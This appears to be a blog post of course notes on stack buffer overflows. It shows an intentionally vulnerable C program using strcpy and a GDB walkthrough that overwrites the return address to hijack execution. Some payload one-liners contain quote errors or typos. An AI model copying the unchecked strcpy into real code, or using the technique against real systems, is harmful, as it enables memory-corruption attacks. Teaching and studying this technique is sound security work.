Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary x86 General Purpose Registers EIP - instruction pointer ESP - stack pointer EBP - base pointer ESI - source index EDI - destination index EAX - accumulator EBX - base ECX - counter EDX - data Sample of Vulnerable Code (C) overflowtest.c: include #include void overflowed() { printf("%s\n", "Execution Hijacked"); } void function1(char *str){ char buffer[5]; strcpy(buffer, str); } void main(int argc, char *argv[]) { function1(argv[1]); printf("%s\n", "Executed normally"); } Vulnerability: (1) Strcpy does not perform bounds checking. (2) Uses Strcpy to copy user input into a fixed sized variable. Therefore, if we give it more data than the variable can hold, the copying will continue into adjacent memory addresses. Compiling Program
gcc -fno-stack-protector -o overflowtest overflowtest.c *-fno-stack-protector turns off the stack cookie Execution: ./overflowtest AAAA /*Executed Normally*/ Overflowing Buffer with Strcpy: /overflowtest AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA /* Segmentation fault */ *Overwrites saved EBP and saved return pointer *Overwrites any additional space in function’s stack frame *When runs out of space, it keeps copying data into adjacent memory addresses GDB commands: (gdb) list 1, 16 [lists source code] (gdb) break 10 [sets a breakpoint on line 10] (gdb) break 14 [sets a breakpoint on line 14] (gdb) break 11 [sets a breakpoint on line 11] (gdb) run AAAA [runs the program in GDB] (gdb) info registers (gdb) x/20xw $esp [memory of ESP] (gdb) x/xw $ebp [memory of EBP] (gdb) continue (gdb) x/20xw $esp (gdb) x/xw $ebp So What is This? Between function and main’s stack frame’s there are four bytes: 0x08048494 -> AAAA (gdb) disass main [disassemble the main function] (gdb) continue (gdb) run ABCD (gdb) continue (gdb) continue (gdb) x/20xw $esp (gdb) x/xw $ebp 0x4104a000 0x00444342 A= 41 B=42 C=43 D=4 Endianess Which byte gets loaded first Intel arch is little endian (gdb) run $(python -c 'print "A” * 30') (gdb) x/20xw $esp (gdb) x/xw $ebp (gdb) continue Program received signal SIGSEGV, Segmentation fault. (gdb) run $(python -c 'print "A” * 17 + "B” * "4"') (gdb) x/20xw $esp (gdb) x/xw $ebp (gdb) continue Program received signal SIGSEGV, Segmentation fault. (gdb) disass overflowed [redirecting execution] (gdb) run $(perl -e 'print "A" x 17 . "\x08\x04\x84\x4d"') (gdb) x/20xw $esp (gdb) x/xw $ebp (gdb) continue Program received signal SIGSEGV, Segmentation fault. 0x4d840408 in ?? () Now, we account for endianness. (gdb) run $(python -c 'print "A” * 17 + "\x08\x04\x84\x4d"') [flip the bytes to account for endianness] (gdb) x/20xw $esp (gdb) x/xw $ebp (gdb) continue Continuing. Execution Hijacke
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
July 2016
Categories |